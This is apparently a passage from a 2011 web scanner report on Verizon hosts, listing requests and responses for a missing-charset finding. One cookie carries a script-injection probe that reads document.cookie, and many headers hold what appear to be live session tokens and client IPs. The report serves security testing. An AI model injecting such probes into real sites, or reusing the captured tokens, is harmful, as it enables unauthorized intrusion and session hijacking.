UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; SrcClientID=smallbusiness.verizon.com; vzAppID=; LOB_CATEGORY=; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; AimsChatURL_Cookie=https://collaborateext.verizon.com; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; CMS_TimeZoneOffset=300; CP=null*; refURL=http://www22.verizon.com/residentialhelp/phone; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Content-Length: 298
Cache-Control: private, max-age=1203
Date: Mon, 05 Sep 2011 22:41:48 GMT
Connection: keep-alive




<html>
<head>
<title>Verizon | My Verizon Login</title>
<meta http-equiv="refresh" content="0;URL=http://www22.verizon.com/Foryourhom
...[SNIP]...

24. HTML does not specify charset previous next
There are 53 instances of this issue:

http://ad.doubleclick.net/adi/N2870.vznbiz/B3160296
http://cache.vzw.com/scripts/globalnav/blank.html
http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234568496.html
http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234571455.html
http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234571456.html
http://d1qpxk1wfeh8v1.cloudfront.net/tags/totaltagdefault.html
http://dcshm.verizon.net/dcsjcxdpzghjg5e6ym5wj21gv_1r5z/wtid.js
http://dcshm.verizon.net/dcso2yy35hhjg5e6ym5wj21gv_6r3b/wtid.js
http://ehg-verizon.hitbox.com/HG
http://ehg-verizon.hitbox.com/HGct
https://enterprisecenter.verizon.com/
http://fls.doubleclick.net/activityi
http://headlines.verizon.com/
http://headlines.verizon.com/headlines/resources/images/featuredArticle.png
http://headlines.verizon.com/headlines/resources/images/followUsOnTwitter.png
http://headlines.verizon.com/headlines/resources/images/navOff_02.png
http://headlines.verizon.com/headlines/resources/images/navOff_03.png
http://headlines.verizon.com/headlines/resources/images/navOff_04.png
http://headlines.verizon.com/headlines/resources/images/navOff_05.png
http://headlines.verizon.com/headlines/resources/images/navOff_06.png
http://headlines.verizon.com/headlines/resources/images/navOff_07.png
http://headlines.verizon.com/headlines/resources/images/navOff_08.png
http://headlines.verizon.com/headlines/resources/images/navOn_01.png
http://headlines.verizon.com/headlines/resources/images/pageTitleHeadlines.png
http://headlines.verizon.com/headlines/resources/images/primaryNavPipe.png
http://headlines.verizon.com/headlines/resources/images/twit_pipe.png
http://headlines.verizon.com/headlines/resources/images/verizonEmail.png
http://phones.verizonwireless.com/htc/thunderbolt/
http://promo.verizon.com/omk/online.shtml
http://s.xp1.ru4.com/meta
http://sales.liveperson.net/visitor/addons/deploy.asp
http://search.verizon.com/
https://secure.opinionlab.com/rate36_json.asp
https://secure.opinionlab.com/rate36s.asp
http://tags.bluekai.com/site/4335
http://tags.bluekai.com/site/4357
http://verizon.com/
http://verizonconnections.vzcomportal.com/
http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard
http://webmail.verizonemail.net/
http://webmail.verizonemail.net/webmail/servlet/HttpNimletDriver
http://www.connecttoverizon.com/
http://www.connecttoverizon.com/loginFailed.html
http://www.connecttoverizon.com/order-now.html
http://www.verizon.com/fiostv
http://www.verizonbusiness.com/Medium/about/promotions/ida_t1/%20
http://www22.verizon.com/copyright
http://www22.verizon.com/wholesale/solutions/solution/physical%2bcollo.html
https://www22.verizon.com/foryourhome/registration/forgotuid/javascript:void(0)
https://www22.verizon.com/includes/javascript/commonjs/
https://www22.verizon.com/includes/javascript/oo_engine_c.js
https://www22.verizon.com/myverizon/
https://www22.verizon.com/vzTracker/vzTracker.aspx

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

24.1. http://ad.doubleclick.net/adi/N2870.vznbiz/B3160296 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2870.vznbiz/B3160296

Request

Response

24.2. http://cache.vzw.com/scripts/globalnav/blank.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cache.vzw.com
Path:	/scripts/globalnav/blank.html

Request

GET /scripts/globalnav/blank.html HTTP/1.1
Host: cache.vzw.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
Cookie: V1Z2=3Xxb5cGQpT1L4o_oOLroIebqfANPB4UFu_z48jlyljwyA3Qbv3rwiCA

Response

HTTP/1.1 200 OK
Server: None
Content-Type: text/html
Last-Modified: Fri, 10 Sep 2010 20:23:52 GMT
ETag: "f-4c8a93d8"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 15
Date: Mon, 05 Sep 2011 22:14:59 GMT
Connection: close

<html></html>

24.3. http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234568496.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d1qpxk1wfeh8v1.cloudfront.net
Path:	/tags/1234568496.html

Request

Response

24.4. http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234571455.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d1qpxk1wfeh8v1.cloudfront.net
Path:	/tags/1234571455.html

Request

Response

24.5. http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234571456.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d1qpxk1wfeh8v1.cloudfront.net
Path:	/tags/1234571456.html

Request

Response

24.6. http://d1qpxk1wfeh8v1.cloudfront.net/tags/totaltagdefault.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d1qpxk1wfeh8v1.cloudfront.net
Path:	/tags/totaltagdefault.html

Request

Response

24.7. http://dcshm.verizon.net/dcsjcxdpzghjg5e6ym5wj21gv_1r5z/wtid.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dcshm.verizon.net
Path:	/dcsjcxdpzghjg5e6ym5wj21gv_1r5z/wtid.js

Request

GET /dcsjcxdpzghjg5e6ym5wj21gv_1r5z/wtid.js HTTP/1.1
Host: dcshm.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; lob=webmail

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:18:42 GMT
Connection: close

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

24.8. http://dcshm.verizon.net/dcso2yy35hhjg5e6ym5wj21gv_6r3b/wtid.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dcshm.verizon.net
Path:	/dcso2yy35hhjg5e6ym5wj21gv_6r3b/wtid.js

Request

GET /dcso2yy35hhjg5e6ym5wj21gv_6r3b/wtid.js HTTP/1.1
Host: dcshm.verizon.net
Proxy-Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lob=webmail; WEBTRENDS_ID=50.23.123.106-3158466032.30174233::046E21CED6AA0DE4777A384B405EDE54; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:21:17 GMT
Connection: close

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

24.9. http://ehg-verizon.hitbox.com/HG previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ehg-verizon.hitbox.com
Path:	/HG

Request

GET /HG HTTP/1.1
Host: ehg-verizon.hitbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Date: Mon, 05 Sep 2011 22:35:21 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Connection: close
Pragma: no-cache
Cache-Control: max-age=0, private, proxy-revalidate
Expires: Mon, 05 Sep 2011 22:35:22 GMT
Content-Type: text/html
Content-Length: 58

<html>
<body>
<p>400 Bad Request</p>
</body>
</html>

24.10. http://ehg-verizon.hitbox.com/HGct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ehg-verizon.hitbox.com
Path:	/HGct

Request

GET /HGct HTTP/1.1
Host: ehg-verizon.hitbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.11. https://enterprisecenter.verizon.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/

Request

GET / HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/sign-in/vec/network.xml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html
Last-Modified: Sun, 17 Jul 2011 07:09:28 GMT
ETag: W/"6f-4e228aa8"
Vary: accept-encoding
Expires: Mon, 05 Sep 2011 22:25:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:34 GMT
Content-Length: 111
Connection: keep-alive

<HTML>
<HEAD>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/enterprisesolutions/global/gHome.do">
</HEAD>
</HTML>

24.12. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Request

GET /activityi;src=1475931;type=corpo676;cat=veriz532;ord=321922022725.6525? HTTP/1.1
Host: fls.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 05 Sep 2011 22:14:13 GMT
Expires: Mon, 05 Sep 2011 22:14:13 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 194
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"></body></html>

24.13. http://headlines.verizon.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://headlines.verizon.com
Path:	/

Request

GET / HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=verizon+online+news+webmail#q=site:verizon.com+online+news+webmail&hl=en&prmd=ivns&ei=RVBlTuSuBePmiAKx7NyXCg&start=10&sa=N&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 14 Apr 2010 19:27:08 GMT
ETag: "50720f-cc-484375d2adb00"
Accept-Ranges: bytes
Content-Length: 204
Content-Type: text/html
Date: Mon, 05 Sep 2011 22:42:34 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD><TITLE>Headlines - Verizon - News, Information and Opinion</TITLE>
<META HTTP-EQUIV=Refresh CONTENT="0;
URL=http://headlines.verizon.com/headlines/portals/headlines.portal">
</HEAD>
</HT
...[SNIP]...

24.14. http://headlines.verizon.com/headlines/resources/images/featuredArticle.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/featuredArticle.png

Request

GET /headlines/resources/images/featuredArticle.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Sun, 07 Oct 2007 02:16:14 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 1866
Date: Mon, 05 Sep 2011 22:42:51 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR.......q......#`....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx......6..m.&..R._T....{..j..{.C.K...v.$.[.C&a...l.}.;.I2Yb>y.??B8..4.....p..(.B~...........Z..P!...]....|
...[SNIP]...

24.15. http://headlines.verizon.com/headlines/resources/images/followUsOnTwitter.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/followUsOnTwitter.png

Request

GET /headlines/resources/images/followUsOnTwitter.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Thu, 09 Sep 2010 00:11:00 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 2430
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...|..........q......gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<.. .IDATx..Y{.Tg.?.9s......Y`....+.d.S...KklK..H.......#eS.. ..j...H.A.lURMmX..6.Y.*.OX*m....sg.3;3w...w..s;.....c
...[SNIP]...

24.16. http://headlines.verizon.com/headlines/resources/images/navOff_02.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/navOff_02.png

Request

GET /headlines/resources/images/navOff_02.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; 